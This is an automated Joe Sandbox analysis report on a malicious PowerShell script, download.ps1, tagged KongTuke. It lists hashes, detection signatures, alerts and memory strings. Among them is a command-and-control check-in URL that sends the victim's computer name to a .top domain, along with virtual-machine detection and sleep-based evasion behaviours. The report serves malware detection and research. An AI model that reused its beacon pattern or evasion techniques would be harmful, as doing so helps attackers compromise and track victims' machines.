Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1584946
MD5:f44b774aac3ec4688531510b0c1eaf52
SHA1:48e0b9a7650ff5b4294d6a5e6d4bdd6a113ffd1b
SHA256:f0802f6ec8278c7b05dcfcc763107f37f4e78c24d87d881f9fa36dfe6918a36e
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 2800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 1216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 2800, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 2800, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-06T20:02:05.019539+010020577411A Network Trojan was detected192.168.2.55390745.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-06T20:02:05.019539+010018100002Potentially Bad Traffic192.168.2.55390745.61.136.13880TCP
2025-01-06T20:02:06.031749+010018100002Potentially Bad Traffic192.168.2.553908142.250.186.3680TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2151284254.000002931C8D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbs.dll source: powershell.exe, 00000000.00000002.2191030398.0000029336C9F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2191030398.0000029336C63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2192157948.0000029336EEC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2191030398.0000029336CD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbJ source: powershell.exe, 00000000.00000002.2189854699.0000029336B07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: utomation.pdbdbO source: powershell.exe, 00000000.00000002.2189854699.0000029336B07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbv source: powershell.exe, 00000000.00000002.2191030398.0000029336CD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb- source: powershell.exe, 00000000.00000002.2191030398.0000029336CD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbalidateNotNuR source: powershell.exe, 00000000.00000002.2191030398.0000029336C63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvice6 source: powershell.exe, 00000000.00000002.2191030398.0000029336C9F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2151284254.000002931C957000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.2189854699.0000029336B07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2191030398.0000029336C63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbL source: powershell.exe, 00000000.00000002.2191030398.0000029336C63000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.5:53907 -> 45.61.136.138:80
Queries Google from non browser process on port 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:53908 -> 142.250.186.36:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:53907 -> 45.61.136.138:80
Source: global trafficHTTP traffic detected: GET /f7qe6pa3v1htr.php?id=user-PC&key=63266493739&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bfhdkgmmhdbikgj.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /f7qe6pa3v1htr.php?id=user-PC&key=63266493739&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bfhdkgmmhdbikgj.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: bfhdkgmmhdbikgj.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FB5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$q0683ukmncpy7gl/$6feonrgjq9a5ulh.php?id=$env:computername&key=$buwjfgxalt&s=527
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.2151716083.000002931FB5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FDFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bfhdkgmmhdbikgj.top
Source: powershell.exe, 00000000.00000002.2151716083.000002931FB5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bfhdkgmmhdbikgj.top/f7qe6pa3v1htr.php?id=user-PC&key=63266493739&s=527
Source: powershell.exe, 00000000.00000002.2191030398.0000029336C0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
Source: powershell.exe, 00000000.00000002.2189658899.0000029336A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft$T5
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.0000029320D06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.0000029320B5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.0000029320CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2151716083.000002931E641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FDFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.2191030398.0000029336C0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwft.com/p/Mic
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.2151716083.000002931E641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2180658553.000002932E819000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FF16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2180658553.000002932E819000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.2151716083.000002931FF16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.2180658553.000002932E819000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.2151716083.000002931FF16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?q=https://www.google.com/maps/search/electronics%2Brecycling%2Bnear%2Bme%
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.2151716083.000002931FF16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.2151716083.000002931FF16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E78B820_2_00007FF848E78B82
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E77DD60_2_00007FF848E77DD6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E6CA310_2_00007FF848E6CA31
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E70BFB0_2_00007FF848E70BFB
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfgX
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.2151716083.000002931FF16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: powershell.exe, 00000000.00000002.2180658553.000002932E819000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ3w2vUdXI9ejzx0mhDnmn_Va-SAOMI2d" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="dOqGI8EeMr2eEXmd9UgJsw">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br><div id="K7FuCf"><style>.U8K5Lc{font-size:small;margin-bottom:32px}.U8K5Lc a.qDTOof{display:inline-block;text-decoration:none}.U8K5Lc img{border:none;margin-right:5px;vertical-align:middle}</style><div class="U8K5Lc" data-ved="0ahUKEwi8qdGd5OGKAxVfb_UHHXwOL9cQnIcBCAU"><span>Upgraded your electronics over the holidays? </span><a href="https://www.google.com/url?q=https://www.google.com/maps/search/electronics%2Brecycling%2Bnear%2Bme%3Futm_source%3DHPP%26utm_medium%3Ddesktop%26utm_campaign%3DEwaste%2BHoliday%2BCampaign%2B%26utm_id%3DEwasterecycling%26utm_term%3DUS%26utm_content%3Den&amp;source=hpp&amp;id=19046121&amp;ct=3&amp;usg=AOvVaw3SNF5CNo-7gwa7PQz4J_To&amp;sa=X&amp;ved=0ahUKEwi8qdGd5OGKAxVfb_UHHXwOL9cQ8IcBCAY" rel="nofollow">Find where to recycle</a><span> old devices</span></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2025 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="dOqGI8EeMr2eEXmd9UgJsw">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="dOqGI8EeMr2eEXmd9UgJsw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPo
